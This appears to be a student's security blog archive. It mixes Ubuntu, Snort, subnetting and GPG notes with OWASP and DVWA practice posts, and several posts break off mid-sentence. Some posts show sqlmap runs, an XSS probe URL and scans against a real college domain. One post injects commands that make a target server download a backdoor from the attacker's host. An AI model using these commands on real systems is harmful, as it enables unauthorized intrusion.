Error when Updating Ubuntu

The problem :

W: GPG error: http://archive.canonical.com
 jaunty Release: The following signatures were invalid: BADSIG 
40976EAF437D05B5 Ubuntu Archive Automatic Signing Key 
<ftpmaster@ubuntu.com>

W: GPG error: http://security.ubuntu.com
 jaunty-security Release: The following signatures were invalid: BADSIG 
40976EAF437D05B5 Ubuntu Archive Automatic Signing Key 
<ftpmaster@ubuntu.com>

W: GPG error: http://us.archive.ubuntu.com
 jaunty Release: The following signatures were invalid: BADSIG 
40976EAF437D05B5 Ubuntu Archive Automatic Signing Key 
<ftpmaster@ubuntu.com>

W: GPG error: http://us.archive.ubuntu.com
 jaunty-updates Release: The following signatures were invalid: BADSIG 
40976EAF437D05B5 Ubuntu Archive Automatic Signing Key 
<ftpmaster@ubuntu.com>

How to fix :

apt-get clean
cd /var/lib/apt
mv lists lists.old
mkdir -p lists/partial
apt-get clean
apt-get update

S N O R T

SNORT is simple software are very useful to see activity from computer networking. Snort can be used as Network Intrusion Detection System (NIDS) in lightweight and this software use rules system to detecting and logging from any assault in computer networking. With any rules to detect signature from any assault, then Snort can detect and logging that assault.This software is opensource based from GNU (General Public License)[GNU89], so that can it's free to used and the source code for Snort can be obtained and modified if we necessary. Initially, Snort be made to operating system based unix, but in windows version also been made too, and now Snort is cross-platform.
Snort is software who still based command-line, so it's be troublesome for user who are used to Graphical User Interface (GUI). Therefore, there are some software from third person provide GUI for Snort, for example IDScenter for Microsoft Windows and Acid based PHP so we can accessed from web browser.
Snort has a language-making rules relatively easy to learned and flexible.
Snort have a database for any rules.
Snort can do logging direct to database system, for example to MySQL, PostGRE SQL and MS

Install Google Chrome in Backtrack 5

Many people are questioning how to install google chrome in backtrack.

This time I will tell you how to install google chrome in backtrack 5. Follow the steps below :

1.   apt-get install chromium-browser

You can also use synaptic and select the chromium-browser.

2.   cd /usr/lib/chromium-browser

3.      Replace geteuid to be getppid using hexedit with the following command :

hexedit chromium-browser

Then press tab to switch to the mode string. Then press ctrl+s and type geteuid. Replace geteuid to be getppid then press ctrl+x to exit!

4.      Enjoy your google chrome!!!

Installing Backdoor in the Database through SQL Injection

Now, I will to explain about how to installing backdoor in the database through SQL Injection. For this practice, I try to use DVWA as web application. DVWA is already available web application about SQL Injection and SQL Injection (Blind).

First, I choose SQL Injection as my target. In the user id form, I just type admin and then click submit, but does not happen. Then, I try to copy address (from the site after I submit the admin as user id). I use sqlmap and try this command :

root@bt:/pentest/database/sqlmap# ./sqlmap.py –u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=admin&Submit=Submit"

but, this is failed to get database. Then, I try to use tamper data from browser. From tamper data, I get cookie and copy it. With sqlmap, I try to scan again with this command :

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101

/dvwa/vulnerabilities/sqli/?id=admin&Submit=Submit" --cookie="security=low; PHPSESSID=0pggchrjrb0lj1ttrobmp1ace4"

the result from the command above, I can see the parameter id is vulnerable and might me injectable.

SOCKS, SOCKS v4, SOCKS v5 and HTTP

SOCKS is an Internet protocol that routes network packets between a client and server through a proxy server. Socks5 additionally provides authentication so only authorized users may access a server. Practically, a SOCKS server will proxy TCP connections to an arbitrary IP address as well as providing a means for UDP packets to be forwarded.

One use of SOCKS is to allow connections to be made through a firewall.

SOCKS4 is the first widely adopted version of the protocol.  It suffers from a couple of problems which have been remedied in SOCKS4A and SOCKS5, namely :

·       It requires clients to know the IP address (e.g. 123.123.123.123) of the servers they want to connect to.  This means, in most cases, that they must be able to resolve domain names.

·        There is no authentication.  A client only requires a user-name to be able to access SOCKS4 services.

SOCKS4A is a simple extension to SOCKS4 which solves the former problem, but not the latter.

SOCKS5 is the most recent version of the SOCKS protocol.  It solves both the problems of

Hacking System Through Web Application

Some people who create web usually not notice the secure from their web. It is dangerous and harmless. Through web application, we can attack the server.

In this post, I will to tell about my experience how to hacking server through web application.

First step, we must search the vulnerability from the web application. In this web, I found the command execution from the site.

Then, I try to ping the IP address (in this case, I already have IP address from the server).

After I write the IP address, the result appears below. It mean I can do something from this command execution.

Next, I try to upload image through command execution but nothing response or not happen anything. Then, I try to upload backdoor and the response is same with when I upload image.

To upload file through command execution we can use this command :

ip_target | wget our_ip_address/file.jpg -O 123.jpg (in this command we must start our apache and file must saved to /var/www/)

or we can use this command :

;wget (layout file)/file.php -O 123.php

.htaccess

Hypertext Access, commonly shortened to htaccess, is a configuration file which controls the directory it is placed in and all the subdirectories underneath it. It’s an incredibly useful feature which allows webmasters to control how many aspects of their website works. You can redirect pages, change the extensions of pages, password protect directories and much much more.

In this htaccess guide I will show you some of the basic tricks and tips which will help you with your website.

So what is htaccess?

The htaccess file is a configuration file which is used on Apache based web servers to control many features of the server. The file itself is just a small basic text file and can be edited via your hosts file manager or alternatively you can download the file, edit it and reupload it.

If you have installed a script before then chances are you have had to edit the

.htaccess file at one point or another. The .htaccess file gives you a lot of control and lets you easily redirect pages, password protect directories and much more. Before I go through some tutorials which show you how to use htaccess, I think it is necessary to show you how you edit the file.

Suhosin

Suhosin is part of the Hardened PHP project, the project to make PHP more secure. Suhosin PHP extension that will be checking various things such as suspicious input (to detect SQL injection for example), prevent the occurrence of a bug in the Zend engine, making the default PHP settings to be more secure (eg turning off the remote features include by default), etc.. For more details about the features and usage can be read on the homepage Suhosin Suhosin.

For the sake of better security, on the hosting server, equipped with Suhosin PHP installation began in January 2007.

Equipped Suhosin PHP is not a "silver bullet" or a comprehensive solution that is perfect. The most important factor remains keeping the security is in your hands as a programmer / developer to keep doing the programming is secure and install an application / library PHP is up to date.

Multi Level Login 2

I get a chance to looking for solution about multi level login 2. The following is a screenshoot from multi leve login 2 :

SUBNETTING

Subnetting is a technique that allows network administrators to take advantage of 32 bit IP addresses that are available more efficiently. Subnetting techniques to make the network more extensive scale and not by classes under IP (IP Classes) A, B, and C to the set. With subnetting, you can create a network with more realistic limits appropriate host necessary.Subnetting provide a more flexible way to determine which parts of a 32 bit IP adddress representing network ID and which part represents the host ID.

Classes with a standard IP address, only 3 possible network IDs are available; 8 bits for class A, 16 bits for class B, and 24 bits for class C. Subnetting allows you to choose a random bit number (arbitrary number) to be used as a network ID.

Two main reasons for doing subnetting :

1. Allocating the limited IP address to be more efficient. If the Internet is limited by the addresses in class A, B, and C, each network will possess 254, 65,000, or 16 million to the host device's IP address. Although there are many networks with the number of hosts more than 254, but only a few network (if you do not want to say no), which has hosted as

Webgoat Installation

WebGoat is based on the concept of teaching a user a real world lesson and then asking the user to demonstrate their understanding by exploiting a real vulnerability on the local system. The system is even clever enough to provide hints and show the user cookies, parameters and the underlying Java code if they choose. Examples of lessons include SQL injection to a fake credit card database, where the user creates the attack and steals the credit card numbers.

In this chance, I will tell you about how to installation webgoat.

Follow the steps below :

1.      Download webgoat Here

2.      Download java Here

3.      Extract webgoat with this command :

root@bt:~#7z x WebGoat-OWASP_Standard-5.3_RC1.7z

Information :

7z = used for unzip WebGoat-OWASP_Standard-5.3_RC1.7z

x = used for extract file with full path

XSS Reflected and XSS Stored

What is a Reflected Cross Site Scripting vulnerability

The malicious user has discovered that a field within a website or web application holds a XSS vulnerability. This malicious user then crafts a way to use the vulnerability to execute something malicious to some unknown user. Reflected XSS vulnerabilities occur when a unknowing user is directed to a web application that has a XSS vulnerability, by the malicious user. Once the unknowing user gets to the web site or application the malicious user's attack is executed.

The attack is crafted by a series of url parameters that are sent via a url. The malicious user then sends his/her malicious url with the url parameters to unknowing users. This is typically sent by email, instant messages, blogs or forums, or any other possible methods.

You think that the unknowing user would not click on some link that looked like it does something bad. But the reflected attack can occur using javascript that once an email is opened or even the website is viewed the attack is executed. Additionally the attack is typically url encoded, hex coded, or some other

encoding method to try and make the url appear as something valid.

What is a Stored Cross Site Scripting vulnerability

DVWA - CSRF (High)

In this chance, I will share my experience about DVWA. I have tried to complete DVWA with high level but I'm still confused. I still not understand about the purpose from this problem. this is some picture I've done :

Picture above is a page from CSRF with high level.

Difference of SQL Injection with SQL Injection (Blind)

Blind SQL Injection is a technique exploits the different databases with normal sql injection. On a regular sql injection will issue a value but in blind sql injection techniques will not issue a value anything but we will know the values by trial and error will the values / test is true or false value ...

GT here using the command

mid () = almost the same function as substring ()

char () = is a variable of character

Data Validation Testing

TESTING FOR REFLECTED CROSS SITE SCRIPTING (OWASP-DV-001)

Reflected Cross-site Scripting (XSS) is another name for non-persistent XSS, where the attack doesn't load with the vulnerable web application but is originated by the victim loading the offending URI. In this article we will see some ways to test a web application for this kind of vulnerability.

The following are the steps I have done :

1.      OWASP-DV-001

In this phase, I tried to write the following url :

http://akakom.ac.id/index.php?user=<script>alert(latihan)</script>, and here are the result :

 

Cookie and Session

Understanding COOKIES

Cookies are data files written to your hard disk by a Web server computer that is used to identify itself so that users on the site when the user re-visiting the site, the site will be able to recognize it.

Functions of cookies :

1.    Helping the web site to "remember" who we are and set the appropriate preferences so that when the user re-visiting this web site will be instantly recognizable.

2.  Eliminating the need to re-register on the web site again when accessing the (site only), cookies help the user logged into the web server.

3.   Allows web site to browse the web surfing patterns of users and to know your favorite sites are frequently visited.

Types of Cookies

1.    Non-persistent (session) cookies. A cookie that will disappear when users close the browser and is usually used on the 'shopping carts' in the online shopping store to browse the items

Session Management, Authorization Testing, Business Logic Testing

This time I will tell you what I have done on the topic on session management.

This describes how to analyse a Session Management Schema, with the goal to understand how the Session Management

mechanism has been developed and if it is possible to break it to bypass the user session. It explains how to test the

security of session tokens issued to the client's browser: how to reverse engineer a cookie, and how to manipulate cookies

to hijack a session.

The following are the steps I have done :

1. Session Management-001

    - open browser

  - on the browser, click edit => Preferences => Advanced => Network => Setting => on the manual proxy configuration, use 127.0.0.1 as HTTP proxy and use 8008 as port.

    - open webscarab

Introduction to Computer Security

There is no precise definition for 'safe' or 'unsafe' in the computer system. Development of science and technology that lead to things like that.

Security is something that allows the system and users to :

·         Verify the identity of the entity

·         Maintain valuable information (personal data, passwords, etc.)

Computer Security Purpose :

·         To safe the secret data / information (confidentiality)

·         To prevent data from changes by unauthorized parties (integrity)

·         To ensure that data is available when needed

Some solution to make our computer more secure are below :

·         Update OS

·         Use antivirus (more than one)

·         Update your antivirus databases

     

Configuration Management Testing

This time I will tell you about material related to OWASP Testing Configuration Management. After reading the book from the OWASP testing guide about me and my group to try to practice the material on Testing Configuration Management. The following are the steps we have done :

1.      SSL / TLS Testing

With the konsole we write this command :

root@bt:~# nmap -F -sV akakom.ac.id

Starting Nmap 5.51 ( http://nmap.org ) at 2011-06-04 19:08 WIT

Nmap scan report for akakom.ac.id (110.76.151.2)

Host is up (0.97s latency).

Not shown: 87 closed ports

PORT    STATE    SERVICE      VERSION

22/tcp  open     ssh          OpenSSH 5.5 (protocol 2.0)

25/tcp  open     smtp         Sendmail 8.14.4/8.14.4

53/tcp  open     domain

80/tcp  open     http         Apache httpd

GPG Tutorial

Network Security is very important. but, awareness of that is still lacking. if we have important file in our computer we must safe that file from the others.

In this time I want to tell about PGP. PGP can safe our file our email from the others. this is steps to use PGP to safe our email.

If we use Linux as our OS, we can write on konsole below :

root@bt:~# gpg --gen-key

gpg (GnuPG) 1.4.10; Copyright (C) 2008 Free Software Foundation, Inc.

This is free software: you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.

Please select what kind of key you want:

   (1) RSA and RSA (default)

   (2) DSA and Elgamal

   (3) DSA (sign only)

   (4) RSA (sign only)

Network Security Material

In this chance, I want to tells about something that I get from the material this afternoon. Me and my friends are invited to learn about network security in our campus.

Network security is very important, but many of us underestimate about it.

In this case we are required to think as a striker because of an attacker we can find holes or weaknesses and fix them for cover or reduce the gap of our network security.

There are several stages or steps that we can do to guide us in network security :

-         Information gathering

In this section we can collect the information from our target like OS that used the target, server, port, etc.

-         Configurating management testing

-         Authentication testing

-         Session management

-         Authorization testing

-         Data validation testing

-         And so on.

INFORMATION GATHERING

This time I will tell my first exercise of information gathering.

1.      OWASP-IG-001

Black box testing :

by using the console, I write this command :

root@bt:~# wget http://www.akakom.ac.id/robots.txt

--2011-06-02 09:48:22-- http://www.akakom.ac.id/robots.txt

Resolving www.akakom.ac.id... 110.76.151.4

Connecting to www.akakom.ac.id|110.76.151.4|:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 304 [text/plain]

Saving to: `robots.txt'

100%[=============================================================>] 304 --.-K/s in0s

2011-06-02 09:48:22 (25.2 MB/s) - `robots.txt' saved [304/304]